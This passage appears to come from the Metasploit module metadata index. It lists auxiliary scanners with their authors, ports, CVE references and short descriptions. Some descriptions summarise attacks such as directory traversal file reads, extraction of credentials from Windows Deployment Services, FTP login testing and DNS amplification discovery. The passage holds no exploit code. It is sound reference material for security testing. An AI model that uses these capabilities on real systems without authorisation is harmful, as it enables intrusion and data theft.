}
},
"auxiliary_scanner/dcerpc/management": {
"name": "Remote Management Interface Discovery",
"full_name": "auxiliary/scanner/dcerpc/management",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can be used to obtain information from the Remote\n Management Interface DCERPC service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 135,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/dcerpc/management.rb",
"is_install_path": true,
"ref_name": "scanner/dcerpc/management",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dcerpc/tcp_dcerpc_auditor": {
"name": "DCERPC TCP Service Auditor",
"full_name": "auxiliary/scanner/dcerpc/tcp_dcerpc_auditor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Determine what DCERPC services are accessible over a TCP port",
"references": [
],
"platform": "",
"arch": "",
"rport": 135,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb",
"is_install_path": true,
"ref_name": "scanner/dcerpc/tcp_dcerpc_auditor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dcerpc/windows_deployment_services": {
"name": "Microsoft Windows Deployment Services Unattend Retrieval",
"full_name": "auxiliary/scanner/dcerpc/windows_deployment_services",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module retrieves the client unattend file from Windows\n Deployment Services RPC service and parses out the stored credentials.\n Tested against Windows 2008 R2 x64 and Windows 2003 x86.",
"references": [
"MSDN-http://msdn.microsoft.com/en-us/library/dd891255(prot.20).aspx",
"URL-http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html"
],
"platform": "",
"arch": "",
"rport": 5040,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb",
"is_install_path": true,
"ref_name": "scanner/dcerpc/windows_deployment_services",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dect/call_scanner": {
"name": "DECT Call Scanner",
"full_name": "auxiliary/scanner/dect/call_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"DK <privilegedmode@gmail.com>"
],
"description": "This module scans for active DECT calls",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/dect/call_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/dect/call_scanner",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dect/station_scanner": {
"name": "DECT Base Station Scanner",
"full_name": "auxiliary/scanner/dect/station_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"DK <privilegedmode@gmail.com>"
],
"description": "This module scans for DECT base stations",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/dect/station_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/dect/station_scanner",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/discovery/arp_sweep": {
"name": "ARP Sweep Local Network Discovery",
"full_name": "auxiliary/scanner/discovery/arp_sweep",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"belch"
],
"description": "Enumerate live hosts on the local network using ARP requests. Because ARP is\n link-layer, this cannot reach beyond the local broadcast domain.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-10-31 04:53:14 +0000",
"path": "/modules/auxiliary/scanner/discovery/arp_sweep.rb",
"is_install_path": true,
"ref_name": "scanner/discovery/arp_sweep",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/discovery/empty_udp": {
"name": "UDP Empty Prober",
"full_name": "auxiliary/scanner/discovery/empty_udp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Detect UDP services that reply to empty probes",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/discovery/empty_udp.rb",
"is_install_path": true,
"ref_name": "scanner/discovery/empty_udp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/discovery/ipv6_multicast_ping": {
"name": "IPv6 Link Local/Node Local Ping Discovery",
"full_name": "auxiliary/scanner/discovery/ipv6_multicast_ping",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wuntee"
],
"description": "Send an ICMPv6 echo request to all default multicast addresses, and wait to see who responds.",
"references": [
"URL-http://wuntee.blogspot.com/2010/12/ipv6-ping-host-discovery-metasploit.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb",
"is_install_path": true,
"ref_name": "scanner/discovery/ipv6_multicast_ping",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/discovery/ipv6_neighbor": {
"name": "IPv6 Local Neighbor Discovery",
"full_name": "auxiliary/scanner/discovery/ipv6_neighbor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"belch"
],
"description": "Enumerate local IPv6 hosts which respond to Neighbor Solicitations with a link-local address.\n Note that, like ARP scanning, this usually cannot be performed beyond the local\n broadcast network.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-10-31 04:53:14 +0000",
"path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb",
"is_install_path": true,
"ref_name": "scanner/discovery/ipv6_neighbor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/discovery/ipv6_neighbor_router_advertisement": {
"name": "IPv6 Local Neighbor Discovery Using Router Advertisement",
"full_name": "auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wuntee",
"d0lph1n98"
],
"description": "Send a spoofed router advertisement with high priority to force hosts to\n start the IPv6 address auto-config. Monitor for IPv6 host advertisements,\n and try to guess the link-local address by concatenating the prefix, and\n the host portion of the IPv6 address. Use NDP host solicitation to\n determine if the IP address is valid. Note that the spoofed advertisement\n is received by every host on the link and alters their address\n configuration, so use with care on production networks.",
"references": [
"URL-http://wuntee.blogspot.com/2010/11/ipv6-link-local-host-discovery-concept.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb",
"is_install_path": true,
"ref_name": "scanner/discovery/ipv6_neighbor_router_advertisement",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/discovery/udp_probe": {
"name": "UDP Service Prober",
"full_name": "auxiliary/scanner/discovery/udp_probe",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect common UDP services using sequential probes",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-05-31 14:32:31 +0000",
"path": "/modules/auxiliary/scanner/discovery/udp_probe.rb",
"is_install_path": true,
"ref_name": "scanner/discovery/udp_probe",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/discovery/udp_sweep": {
"name": "UDP Service Sweeper",
"full_name": "auxiliary/scanner/discovery/udp_sweep",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect interesting UDP services",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/discovery/udp_sweep.rb",
"is_install_path": true,
"ref_name": "scanner/discovery/udp_sweep",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dlsw/dlsw_leak_capture": {
"name": "Cisco DLSw Information Disclosure Scanner",
"full_name": "auxiliary/scanner/dlsw/dlsw_leak_capture",
"rank": 300,
"disclosure_date": "2014-11-17",
"type": "auxiliary",
"author": [
"Tate Hansen",
"John McLeod",
"Kyle Rainey"
],
"description": "This module implements the DLSw information disclosure retrieval. There\n is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains\n that allows an unauthenticated remote attacker to retrieve the partial\n contents of packets traversing a Cisco router with DLSw configured\n and active.",
"references": [
"CVE-2014-7992",
"URL-https://github.com/tatehansen/dlsw_exploit"
],
"platform": "",
"arch": "",
"rport": 2067,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb",
"is_install_path": true,
"ref_name": "scanner/dlsw/dlsw_leak_capture",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dns/dns_amp": {
"name": "DNS Amplification Scanner",
"full_name": "auxiliary/scanner/dns/dns_amp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module can be used to discover DNS servers which expose recursive\n name lookups which can be used in an amplification attack against a\n third party.",
"references": [
"CVE-2006-0987",
"CVE-2006-0988"
],
"platform": "",
"arch": "",
"rport": 53,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/dns/dns_amp.rb",
"is_install_path": true,
"ref_name": "scanner/dns/dns_amp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/elasticsearch/indices_enum": {
"name": "ElasticSearch Indices Enumeration Utility",
"full_name": "auxiliary/scanner/elasticsearch/indices_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Silas Cutler <Silas.Cutler@BlackListThisDomain.com>"
],
"description": "This module enumerates ElasticSearch indices. It does so via the\n REST API.",
"references": [
],
"platform": "",
"arch": "",
"rport": 9200,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/elasticsearch/indices_enum.rb",
"is_install_path": true,
"ref_name": "scanner/elasticsearch/indices_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/emc/alphastor_devicemanager": {
"name": "EMC AlphaStor Device Manager Service",
"full_name": "auxiliary/scanner/emc/alphastor_devicemanager",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module queries the remote host for the EMC Alphastor Device Management Service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb",
"is_install_path": true,
"ref_name": "scanner/emc/alphastor_devicemanager",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/emc/alphastor_librarymanager": {
"name": "EMC AlphaStor Library Manager Service",
"full_name": "auxiliary/scanner/emc/alphastor_librarymanager",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module queries the remote host for the EMC Alphastor Library Management Service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3500,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb",
"is_install_path": true,
"ref_name": "scanner/emc/alphastor_librarymanager",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/etcd/open_key_scanner": {
"name": "Etcd Keys API Information Gathering",
"full_name": "auxiliary/scanner/etcd/open_key_scanner",
"rank": 300,
"disclosure_date": "2018-03-16",
"type": "auxiliary",
"author": [
"Giovanni Collazo <hello@gcollazo.com>",
"h00die"
],
"description": "This module queries the etcd API to recursively retrieve all of the stored\n key value pairs. Etcd does not enable authentication by default, so anyone\n able to reach the API can read every stored key.",
"references": [
"URL-https://elweb.co/the-security-footgun-in-etcd"
],
"platform": "",
"arch": "",
"rport": 2379,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
2379
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-04-04 10:52:47 +0000",
"path": "/modules/auxiliary/scanner/etcd/open_key_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/etcd/open_key_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/etcd/version": {
"name": "Etcd Version Scanner",
"full_name": "auxiliary/scanner/etcd/version",
"rank": 300,
"disclosure_date": "2018-03-16",
"type": "auxiliary",
"author": [
"Giovanni Collazo <hello@gcollazo.com>",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module connects to etcd API endpoints, typically on 2379/TCP, and attempts\n to obtain the version of etcd.",
"references": [
"URL-https://elweb.co/the-security-footgun-in-etcd"
],
"platform": "",
"arch": "",
"rport": 2379,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
2379
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-04-04 11:01:38 +0000",
"path": "/modules/auxiliary/scanner/etcd/version.rb",
"is_install_path": true,
"ref_name": "scanner/etcd/version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/finger/finger_users": {
"name": "Finger Service User Enumerator",
"full_name": "auxiliary/scanner/finger/finger_users",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Identify valid users through the finger service using a variety of tricks",
"references": [
],
"platform": "",
"arch": "",
"rport": 79,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-02-20 15:48:00 +0000",
"path": "/modules/auxiliary/scanner/finger/finger_users.rb",
"is_install_path": true,
"ref_name": "scanner/finger/finger_users",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/anonymous": {
"name": "Anonymous FTP Access Detection",
"full_name": "auxiliary/scanner/ftp/anonymous",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "Detect anonymous (read/write) FTP server access.",
"references": [
"URL-http://en.wikipedia.org/wiki/File_Transfer_Protocol#Anonymous_FTP"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ftp/anonymous.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/anonymous",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/bison_ftp_traversal": {
"name": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure",
"full_name": "auxiliary/scanner/ftp/bison_ftp_traversal",
"rank": 300,
"disclosure_date": "2015-09-28",
"type": "auxiliary",
"author": [
"Jay Turla",
"James Fitts",
"Brad Wolfe <brad.wolfe@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'",
"references": [
"EDB-38341",
"CVE-2015-7602"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/bison_ftp_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/colorado_ftp_traversal": {
"name": "ColoradoFTP Server 1.3 Build 8 Directory Traversal Information Disclosure",
"full_name": "auxiliary/scanner/ftp/colorado_ftp_traversal",
"rank": 300,
"disclosure_date": "2016-08-11",
"type": "auxiliary",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"RvLaboratory"
],
"description": "This module exploits a directory traversal vulnerability found in ColoradoFTP server\n version <= 1.3 Build 8. This vulnerability allows an attacker to download and upload arbitrary files\n on the server by crafting GET/PUT commands that include file system traversal strings starting with '\\\\'.\n The server is written in Java and therefore platform independent, however this vulnerability is only\n exploitable on the Windows version.",
"references": [
"EDB-40231",
"URL-https://bitbucket.org/nolife/coloradoftp/commits/16a60c4a74ef477cd8c16ca82442eaab2fbe8c86",
"URL-http://www.securityfocus.com/archive/1/539186"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-12-11 14:40:09 +0000",
"path": "/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/colorado_ftp_traversal",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/ftp/easy_file_sharing_ftp": {
"name": "Easy File Sharing FTP Server 3.6 Directory Traversal",
"full_name": "auxiliary/scanner/ftp/easy_file_sharing_ftp",
"rank": 300,
"disclosure_date": "2017-03-07",
"type": "auxiliary",
"author": [
"Ahmed Elhady Mohamed"
],
"description": "This module exploits a directory traversal vulnerability found in Easy File Sharing FTP Server version 3.6 and earlier.\n This vulnerability allows an attacker to download arbitrary files from the server by crafting\n a RETR command that includes file system traversal strings such as '../'",
"references": [
"CVE-2017-6510"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ftp/easy_file_sharing_ftp.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/easy_file_sharing_ftp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/ftp_login": {
"name": "FTP Authentication Scanner",
"full_name": "auxiliary/scanner/ftp/ftp_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module will test FTP logins on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database this module will record successful\n logins and hosts so you can track your access.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-12-14 08:05:57 +0000",
"path": "/modules/auxiliary/scanner/ftp/ftp_login.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/ftp_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/ftp_version": {
"name": "FTP Version Scanner",
"full_name": "auxiliary/scanner/ftp/ftp_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect FTP Version.",
"references": [
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ftp/ftp_version.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/ftp_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/konica_ftp_traversal": {
"name": "Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure",
"full_name": "auxiliary/scanner/ftp/konica_ftp_traversal",
"rank": 300,
"disclosure_date": "2015-09-22",
"type": "auxiliary",
"author": [
"Jay Turla",
"James Fitts",
"Brad Wolfe <brad.wolfe@gmail.com>",
"shinnai"
],
"description": "This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0.\n This vulnerability allows an attacker to download arbitrary files from the server by crafting\n a RETR command that includes file system traversal strings such as '..//'",
"references": [
"EDB-38260",
"CVE-2015-7603",
"URL-http://shinnai.altervista.org/exploits/SH-0024-20150922.html"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/konica_ftp_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/pcman_ftp_traversal": {
"name": "PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure",
"full_name": "auxiliary/scanner/ftp/pcman_ftp_traversal",
"rank": 300,
"disclosure_date": "2015-09-28",
"type": "auxiliary",
"author": [
"Jay Turla",
"James Fitts",
"Brad Wolfe <brad.wolfe@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7.\n This vulnerability allows an attacker to download arbitrary files from the server by crafting\n a RETR command that includes file system traversal strings such as '..//'",
"references": [
"EDB-38340",
"CVE-2015-7601"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/pcman_ftp_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/titanftp_xcrc_traversal": {
"name": "Titan FTP XCRC Directory Traversal Information Disclosure",
"full_name": "auxiliary/scanner/ftp/titanftp_xcrc_traversal",
"rank": 300,
"disclosure_date": "2010-06-15",
"type": "auxiliary",
"author": [
"jduck <jduck@metasploit.com>",
"Brandon McCann @zeknox <bmccann@accuvant.com>"
],
"description": "This module exploits a directory traversal vulnerability in the XCRC command\n implemented in versions of Titan FTP up to and including 8.10.1125. By sending\n multiple XCRC commands, it is possible to disclose the contents of any\n file on the drive with a simple CRC \"brute force\" attack.\n\n Although the daemon runs with SYSTEM privileges, access is limited to files\n that reside on the same drive as the FTP server's root directory.",
"references": [
"CVE-2010-2426",
"OSVDB-65533",
"URL-https://seclists.org/bugtraq/2010/Jun/160"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/titanftp_xcrc_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/gopher/gopher_gophermap": {
"name": "Gopher gophermap Scanner",
"full_name": "auxiliary/scanner/gopher/gopher_gophermap",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"h00die"
],
"description": "This module identifies Gopher servers, and processes the gophermap\n file which lists all the files on the server.",
"references": [
"URL-https://sdfeu.org/w/tutorials:gopher"
],
"platform": "",
"arch": "",
"rport": 70,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-10-20 09:44:07 +0000",
"path": "/modules/auxiliary/scanner/gopher/gopher_gophermap.rb",
"is_install_path": true,
"ref_name": "scanner/gopher/gopher_gophermap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/h323/h323_version": {
"name": "H.323 Version Scanner",
"full_name": "auxiliary/scanner/h323/h323_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect H.323 Version.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1720,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/h323/h323_version.rb",
"is_install_path": true,
"ref_name": "scanner/h323/h323_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/a10networks_ax_directory_traversal": {
"name": "A10 Networks AX Loadbalancer Directory Traversal",
"full_name": "auxiliary/scanner/http/a10networks_ax_directory_traversal",
"rank": 300,
"disclosure_date": "2014-01-28",
"type": "auxiliary",
"author": [
"xistence"
],
"description": "This module exploits a directory traversal flaw found in A10 Networks\n (Soft) AX Loadbalancer version 2.6.1-GR1-P5/2.7.0 or less. When\n handling a file download request, the xml/downloads class fails to\n properly check the 'filename' parameter, which can be abused to read\n any file outside the virtual directory. Important files include SSL\n certificates. This module works on both the hardware devices and the\n Virtual Machine appliances. IMPORTANT NOTE: This module will also delete the\n file on the device after downloading it. Because of this, the CONFIRM_DELETE\n option must be set to 'true' either manually or by script.",
"references": [
"OSVDB-102657",
"BID-65206",
"EDB-31261"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/a10networks_ax_directory_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/accellion_fta_statecode_file_read": {
"name": "Accellion FTA 'statecode' Cookie Arbitrary File Read",
"full_name": "auxiliary/scanner/http/accellion_fta_statecode_file_read",
"rank": 300,
"disclosure_date": "2015-07-10",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a file disclosure vulnerability in the Accellion\n File Transfer appliance. This vulnerability is triggered when a user-provided\n 'statecode' cookie parameter is appended to a file path that is processed as\n a HTML template. By prepending this cookie with directory traversal sequence\n and appending a NULL byte, any file readable by the web user can be exposed.\n The web user has read access to a number of sensitive files, including the\n system configuration and files uploaded to the appliance by users.\n This issue was confirmed on version FTA_9_11_200, but may apply to previous\n versions as well. This issue was fixed in software update FTA_9_11_210.",
"references": [
"URL-http://r-7.co/R7-2015-08",
"CVE-2015-2856"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/accellion_fta_statecode_file_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/adobe_xml_inject": {
"name": "Adobe XML External Entity Injection",
"full_name": "auxiliary/scanner/http/adobe_xml_inject",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "Multiple Adobe Products -- XML External Entity Injection. Affected Software: BlazeDS 3.2 and\n earlier versions, LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, and\n 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2",
"references": [
"CVE-2009-3960",
"OSVDB-62292",
"BID-38197",
"URL-http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-05.html"
],
"platform": "",
"arch": "",
"rport": 8400,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/adobe_xml_inject.rb",
"is_install_path": true,
"ref_name": "scanner/http/adobe_xml_inject",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/advantech_webaccess_login": {
"name": "Advantech WebAccess Login",
"full_name": "auxiliary/scanner/http/advantech_webaccess_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will attempt to authenticate to Advantech WebAccess.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
